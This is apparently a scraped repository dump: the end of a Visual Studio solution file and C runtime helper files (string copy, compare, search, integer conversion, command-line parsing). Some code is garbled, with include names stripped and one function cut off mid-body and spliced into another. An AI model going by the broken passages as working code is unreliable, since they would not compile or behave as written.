\"Harusame\", \"Harusame\\Harusame.vcxproj\", \"{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Yuudachi\", \"Yuudachi\\Yuudachi.vcxproj\", \"{14358883-8E74-44F5-BCC4-C32D41A3A662}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Murasame\", \"Murasame\\Murasame.vcxproj\", \"{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Debug|x64.Build.0 = Debug|x64\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Debug|x86.Build.0 = Debug|Win32\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Release|x64.ActiveCfg = Release|x64\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Release|x64.Build.0 = Release|x64\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Release|x86.ActiveCfg = Release|Win32\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Release|x86.Build.0 = Release|Win32\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Debug|x64.Build.0 = Debug|x64\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Debug|x86.Build.0 = Debug|Win32\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Release|x64.ActiveCfg = Release|x64\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Release|x64.Build.0 = Release|x64\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Release|x86.ActiveCfg = Release|Win32\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Release|x86.Build.0 = Release|Win32\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Debug|x64.Build.0 = Debug|x64\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Debug|x86.Build.0 = Debug|Win32\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Release|x64.ActiveCfg = Release|x64\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Release|x64.Build.0 = Release|x64\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Release|x86.ActiveCfg = Release|Win32\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Release|x86.Build.0 = Release|Win32\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Debug|x64.Build.0 = Debug|x64\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Debug|x86.Build.0 = Debug|Win32\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Release|x64.ActiveCfg = Release|x64\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Release|x64.Build.0 = Release|x64\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Release|x86.ActiveCfg = Release|Win32\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Release|x86.Build.0 = Release|Win32\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Debug|x64.Build.0 = Debug|x64\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Debug|x86.Build.0 = Debug|Win32\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Release|x64.ActiveCfg = Release|x64\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Release|x64.Build.0 = Release|x64\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Release|x86.ActiveCfg = Release|Win32\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
},
{
"path": "Source/minirtl/_filename.c",
"content": "#include \n#include \"minirtl.h\"\n\nchar *_filename_a(const char *f)\n{\n\tchar *p = (char *)f;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (char)0) {\n\t\tif (*f == '\\\\')\n\t\t\tp = (char *)f + 1;\n\t\tf++;\n\t}\n\treturn p;\n}\n\nwchar_t *_filename_w(const wchar_t *f)\n{\n\twchar_t *p = (wchar_t *)f;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (wchar_t)0) {\n\t\tif (*f == (wchar_t)'\\\\')\n\t\t\tp = (wchar_t *)f + 1;\n\t\tf++;\n\t}\n\treturn p;\n}\n\nchar *_fileext_a(const char *f)\n{\n\tchar *p = 0;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (char)0) {\n\t\tif (*f == '.')\n\t\t\tp = (char *)f;\n\t\tf++;\n\t}\n\n\tif (p == 0)\n\t\tp = (char *)f;\n\n\treturn p;\n}\n\nwchar_t *_fileext_w(const wchar_t *f)\n{\n\twchar_t *p = 0;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (wchar_t)0) {\n\t\tif (*f == (wchar_t)'.')\n\t\t\tp = (wchar_t *)f;\n\t\tf++;\n\t}\n\n\tif (p == 0)\n\t\tp = (wchar_t *)f;\n\n\treturn p;\n}\n\nchar *_filename_noext_a(char *dest, const char *f)\n{\n char *p, *l, *dot;\n\n if ((f == 0) || (dest == 0))\n return 0;\n\n p = _filename_a(f);\n if (p == 0)\n return 0;\n\n dot = _strend_a(p);\n if (dot == 0)\n return 0;\n\n l = p;\n\n while (*l != (char)0)\n {\n if (*l == '.')\n dot = l;\n l++;\n }\n\n while (p0) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
},
{
"path": "Source/minirtl/_strncmpi.c",
"content": "#include \"rtltypes.h\"\n\nint _strncmpi_a(const char *s1, const char *s2, size_t cchars)\n{\n\tchar c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = locase_a(*s1);\n\t\tc2 = locase_a(*s2);\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = locase_w(*s1);\n\t\tc2 = locase_w(*s2);\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
},
{
"path": "Source/minirtl/_strncpy.c",
"content": "#include \"rtltypes.h\"\n\nchar *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)\n{\n\tchar *p;\n\n\tif ( (dest==0) || (src==0) || (ccdest==0) )\n\t\treturn dest;\n\n\tccdest--;\n\tp = dest;\n\n\twhile ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t\tccdest--;\n\t\tccsrc--;\n\t}\n\n\t*p = 0;\n\treturn dest;\n}\n\nwchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)\n{\n\twchar_t *p;\n\n\tif ( (dest==0) || (src==0) || (ccdest==0) )\n\t\treturn dest;\n\n\tccdest--;\n\tp = dest;\n\n\twhile ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t\tccdest--;\n\t\tccsrc--;\n\t}\n\n\t*p = 0;\n\treturn dest;\n}\n"
},
{
"path": "Source/minirtl/_strstr.c",
"content": "#include \"rtltypes.h\"\n\nchar *_strstr_a(const char *s, const char *sub_s)\n{\n\tchar c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (char *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = *sub_s;\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = *s;\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (char *)s;\n\t\ttmpsub = (char *)sub_s;\n\t\tdo {\n\t\t\tc1 = *tmps;\n\t\t\tc2 = *tmpsub;\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (char *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n\nwchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s)\n{\n\twchar_t c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (wchar_t *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = *sub_s;\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = *s;\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (wchar_t *)s;\n\t\ttmpsub = (wchar_t *)sub_s;\n\t\tdo {\n\t\t\tc1 = *tmps;\n\t\t\tc2 = *tmpsub;\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (wchar_t *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n"
},
{
"path": "Source/minirtl/_strstri.c",
"content": "#include \"rtltypes.h\"\n\nchar *_strstri_a(const char *s, const char *sub_s)\n{\n\tchar c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (char *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = locase_a(*sub_s);\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = locase_a(*s);\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (char *)s;\n\t\ttmpsub = (char *)sub_s;\n\t\tdo {\n\t\t\tc1 = locase_a(*tmps);\n\t\t\tc2 = locase_a(*tmpsub);\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (char *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n\nwchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s)\n{\n\twchar_t c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (wchar_t *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = locase_w(*sub_s);\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = locase_w(*s);\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (wchar_t *)s;\n\t\ttmpsub = (wchar_t *)sub_s;\n\t\tdo {\n\t\t\tc1 = locase_w(*tmps);\n\t\t\tc2 = locase_w(*tmpsub);\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (wchar_t *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n"
},
{
"path": "Source/minirtl/cmdline.c",
"content": "#include \n\nBOOL GetCommandLineParamW(\n\tIN\tLPCWSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPWSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t)\n{\n\tULONG\tc, plen = 0;\n\tTCHAR\tdivider;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = 0;\n\n\tif (CmdLine == NULL) {\n\t\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t\t*Buffer = 0;\n\t\treturn FALSE;\n\t}\n\n\tfor (c = 0; c <= ParamIndex; c++) {\n\t\tplen = 0;\n\n\t\twhile (*CmdLine == ' ')\n\t\t\tCmdLine++;\n\n\t\tswitch (*CmdLine) {\n\t\tcase 0:\n\t\t\tgoto zero_term_exit;\n\n\t\tcase '\"':\n\t\t\tCmdLine++;\n\t\t\tdivider = '\"';\n\t\t\tbreak;\n\n\t\tdefault:\n\t\t\tdivider = ' ';\n\t\t}\n\n\t\twhile ((*CmdLine != '\"') && (*CmdLine != divider) && (*CmdLine != 0)) {\n\t\t\tplen++;\n\t\t\tif (c == ParamIndex)\n\t\t\t\tif ((plen < BufferSize) && (Buffer != NULL)) {\n\t\t\t\t\t*Buffer = *CmdLine;\n\t\t\t\t\tBuffer++;\n\t\t\t\t}\n\t\t\tCmdLine++;\n\t\t}\n\n\t\tif (*CmdLine != 0)\n\t\t\tCmdLine++;\n\t}\n\nzero_term_exit:\n\n\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t*Buffer = 0;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = plen;\n\n\tif (plen < BufferSize)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nBOOL GetCommandLineParamA(\n\tIN\tLPCSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t)\n{\n\tULONG\tc, plen = 0;\n\tTCHAR\tdivider;\n\n\tif (CmdLine == NULL)\n\t\treturn FALSE;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = 0;\n\n\tfor (c = 0; c <= ParamIndex; c++) {\n\t\tplen = 0;\n\n\t\twhile (*CmdLine == ' ')\n\t\t\tCmdLine++;\n\n\t\tswitch (*CmdLine) {\n\t\tcase 0:\n\t\t\tgoto zero_term_exit;\n\n\t\tcase '\"':\n\t\t\tCmdLine++;\n\t\t\tdivider = '\"';\n\t\t\tbreak;\n\n\t\tdefault:\n\t\t\tdivider = ' ';\n\t\t}\n\n\t\twhile ((*CmdLine != '\"') && (*CmdLine != divider) && (*CmdLine != 0)) {\n\t\t\tplen++;\n\t\t\tif (c == ParamIndex)\n\t\t\t\tif ((plen < BufferSize) && (Buffer != NULL)) {\n\t\t\t\t\t*Buffer = *CmdLine;\n\t\t\t\t\tBuffer++;\n\t\t\t\t}\n\t\t\tCmdLine++;\n\t\t}\n\n\t\tif (*CmdLine != 0)\n\t\t\tCmdLine++;\n\t}\n\nzero_term_exit:\n\n\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t*Buffer = 0;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = plen;\n\n\tif (plen < BufferSize)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nchar *ExtractFilePathA(const char *FileName, char *FilePath)\n{\n\tchar *p = (char *)FileName, *p0 = (char *)FileName;\n\n\tif ((FileName == 0) || (FilePath == 0))\n\t\treturn 0;\n\n\twhile (*FileName != 0) {\n\t\tif (*FileName == '\\\\')\n\t\t\tp = (char *)FileName + 1;\n\t\tFileName++;\n\t}\n\n\twhile (p0 < p) {\n\t\t*FilePath = *p0;\n\t\tFilePath++;\n\t\tp0++;\n\t}\n\n\t*FilePath = 0;\n\n\treturn FilePath;\n}\n\nwchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)\n{\n\twchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;\n\n\tif ((FileName == 0) || (FilePath == 0))\n\t\treturn 0;\n\n\twhile (*FileName != 0) {\n\t\tif (*FileName == '\\\\')\n\t\t\tp = (wchar_t *)FileName + 1;\n\t\tFileName++;\n\t}\n\n\twhile (p0 < p) {\n\t\t*FilePath = *p0;\n\t\tFilePath++;\n\t\tp0++;\n\t}\n\n\t*FilePath = 0;\n\n\treturn FilePath;\n}\n"
},
{
"path": "Source/minirtl/cmdline.h",
"content": "#ifndef _CMDLINEH_\n#define _CMDLINEH_\n\nBOOL GetCommandLineParamW(\n\tIN\tLPCWSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPWSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t);\n\nBOOL GetCommandLineParamA(\n\tIN\tLPCSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t);\n\nchar *ExtractFilePathA(const char *FileName, char *FilePath);\nwchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);\n\n#ifdef UNICODE\n\n#define ExtractFilePath\t\t\tExtractFilePathW\n#define GetCommandLineParam\t\tGetCommandLineParamW\n\n#else // ANSI\n\n#define ExtractFilePath\t\t\tExtractFilePathA\n#define GetCommandLineParam\t\tGetCommandLineParamA\n\n#endif\n\n#endif /* _CMDLINEH_ */\n"
},
{
"path": "Source/minirtl/hextou64.c",
"content": "#include \"rtltypes.h\"\n\nunsigned long long hextou64_a(char *s)\n{\n\tunsigned long long\tr = 0;\n\tchar\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = locase_a(*s);\n\t\ts++;\n\t\tif (_isdigit_a(c))\n\t\t\tr = 16 * r + (c - '0');\n\t\telse\n\t\t\tif ((c >= 'a') && (c <= 'f'))\n\t\t\t\tr = 16 * r + (c - 'a' + 10);\n\t\t\telse\n\t\t\t\tbreak;\n\t}\n\treturn r;\n}\n\nunsigned long long hextou64_w(wchar_t *s)\n{\n\tunsigned long long\tr = 0;\n\twchar_t\t\t\tc;\n\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 ) {\n\t\tc = locase_w(*s);\n\t\ts++;\n\t\tif (_isdigit_w(c))\n\t\t\tr = 16*r + (c-L'0');\n\t\telse\n\t\t\tif ((c >= L'a') && (c <= L'f'))\n\t\t\t\tr = 16*r + (c-L'a'+10);\n\t\t\telse\n\t\t\t\tbreak;\n\t}\n\treturn r;\n}\n"
},
{
"path": "Source/minirtl/hextoul.c",
"content": "#include \"rtltypes.h\"\n\nunsigned long hextoul_a(char *s)\n{\n\tunsigned long\tr = 0;\n\tchar\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = locase_a(*s);\n\t\ts++;\n\t\tif (_isdigit_a(c))\n\t\t\tr = 16 * r + (c - '0');\n\t\telse\n\t\t\tif ((c >= 'a') && (c <= 'f'))\n\t\t\t\tr = 16 * r + (c - 'a' + 10);\n\t\t\telse\n\t\t\t\tbreak;\n\t}\n\treturn r;\n}\n\nunsigned long hextoul_w(wchar_t *s)\n{\n\tunsigned long\tr = 0;\n\twchar_t\t\t\tc;\n\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 ) {\n\t\tc = locase_w(*s);\n\t\ts++;\n\t\tif (_isdigit_w(c))\n\t\t\tr = 16*r + (c-L'0');\n\t\telse\n\t\t\tif ((c >= L'a') && (c <= L'f'))\n\t\t\t\tr = 16*r + (c-L'a'+10);\n\t\t\telse\n\t\t\t\tbreak;\n\t}\n\treturn r;\n}\n"
},
{
"path": "Source/minirtl/i64tostr.c",
"content": "#include \"rtltypes.h\"\n\nsize_t i64tostr_a(signed long long x, char *s)\n{\n\tsigned long long\tt=x;\n\tsize_t\t\ti, r=1, sign;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (char)byteabs(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r + sign;\n}\n\nsize_t i64tostr_w(signed long long x, wchar_t *s)\n{\n\tsigned long long\tt=x;\n\tsize_t\t\ti, r=1, sign;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t} else {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r+sign;\n\t\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)byteabs(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r+sign;\n}\n"
},
{
"path": "Source/minirtl/itostr.c",
"content": "#include \"rtltypes.h\"\n\nsize_t itostr_a(int x, char *s)\n{\n\tint\t\tt;\n\tsize_t\ti, r = 1, sign;\n\n\tt = x;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (char)byteabs(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r + sign;\n}\n\n\nsize_t itostr_w(int x, wchar_t *s)\n{\n\tint\t\tt;\n\tsize_t\ti, r = 1, sign;\n\n\tt = x;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (wchar_t)byteabs(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r + sign;\n}\n"
},
{
"path": "Source/minirtl/minirtl.h",
"content": "/*\nModule name:\n\tminirtl.h\n\nDescription:\n\theader for string handling and conversion routines\n\nDate:\n\t1 Mar 2015\n*/\n\n#ifndef _MINIRTL_\n#define _MINIRTL_\n\n// string copy/concat/length\n\nchar *_strend_a(const char *s);\nwchar_t *_strend_w(const wchar_t *s);\n\nchar *_strcpy_a(char *dest, const char *src);\nwchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);\n\nchar *_strcat_a(char *dest, const char *src);\nwchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);\n\nchar *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);\nwchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);\n\nsize_t _strlen_a(const char *s);\nsize_t _strlen_w(const wchar_t *s);\n\n// comparing\n\nint _strcmp_a(const char *s1, const char *s2);\nint _strcmp_w(const wchar_t *s1, const wchar_t *s2);\n\nint _strncmp_a(const char *s1, const char *s2, size_t cchars);\nint _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);\n\nint _strcmpi_a(const char *s1, const char *s2);\nint _strcmpi_w(const wchar_t *s1, const wchar_t *s2);\n\nint _strncmpi_a(const char *s1, const char *s2, size_t cchars);\nint _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);\n\nchar *_strstr_a(const char *s, const char *sub_s);\nwchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);\n\nchar *_strstri_a(const char *s, const char *sub_s);\nwchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);\n\n// conversion of integer types to string, returning string length\n\nsize_t ultostr_a(unsigned long x, char *s);\nsize_t ultostr_w(unsigned long x, wchar_t *s);\n\nsize_t ultohex_a(unsigned long x, char *s);\nsize_t ultohex_w(unsigned long x, wchar_t *s);\n\nsize_t itostr_a(int x, char *s);\nsize_t itostr_w(int x, wchar_t *s);\n\nsize_t i64tostr_a(signed long long x, char *s);\nsize_t i64tostr_w(signed long long x, wchar_t *s);\n\nsize_t u64tostr_a(unsigned long long x, char *s);\nsize_t u64tostr_w(unsigned long long x, wchar_t *s);\n\nsize_t u64tohex_a(unsigned long long x, char *s);\nsize_t u64tohex_w(unsigned long long x, wchar_t *s);\n\n// string to integers conversion\n\nunsigned long strtoul_a(char *s);\nunsigned long strtoul_w(wchar_t *s);\n\nunsigned long long strtou64_a(char *s);\nunsigned long long strtou64_w(wchar_t *s);\n\nunsigned long hextoul_a(char *s);\nunsigned long hextoul_w(wchar_t *s);\n\nint strtoi_a(char *s);\nint strtoi_w(wchar_t *s);\n\nsigned long long strtoi64_a(char *s);\nsigned long long strtoi64_w(wchar_t *s);\n\nunsigned long long hextou64_a(char *s);\nunsigned long long hextou64_w(wchar_t *s);\n\n/* =================================== */\n\n#ifdef UNICODE\n\n#define _strend _strend_w\n#define _strcpy _strcpy_w\n#define _strcat _strcat_w\n#define _strlen _strlen_w\n#define _strncpy _strncpy_w\n\n#define _strcmp _strcmp_w\n#define _strncmp _strncmp_w\n#define _strcmpi _strcmpi_w\n#define _strncmpi _strncmpi_w\n#define _strstr _strstr_w\n#define _strstri _strstri_w\n\n#define ultostr ultostr_w\n#define ultohex ultohex_w\n#define itostr itostr_w\n#define i64tostr i64tostr_w\n#define u64tostr u64tostr_w\n#define u64tohex u64tohex_w\n\n#define strtoul strtoul_w\n#define hextoul hextoul_w\n#define strtoi strtoi_w\n#define strtoi64 strtoi64_w\n#define strtou64 strtou64_w\n#define hextou64 hextou64_w\n\n#else // ANSI\n\n#define _strend _strend_a\n#define _strcpy _strcpy_a\n#define _strcat _strcat_a\n#define _strlen _strlen_a\n#define _strncpy _strncpy_a\n#define _strcmp _strcmp_a\n\n#define _strcmp _strcmp_a\n#define _strncmp _strncmp_a\n#define _strcmpi _strcmpi_a\n#define _strncmpi _strncmpi_a\n#define _strstr _strstr_a\n#define _strstri _strstri_a\n\n#define ultostr ultostr_a\n#define ultohex ultohex_a\n#define itostr itostr_a\n#define i64tostr i64tostr_a\n#define u64tostr u64tostr_a\n#define u64tohex u64tohex_a\n\n#define strtoul strtoul_a\n#define hextoul hextoul_a\n#define strtoi 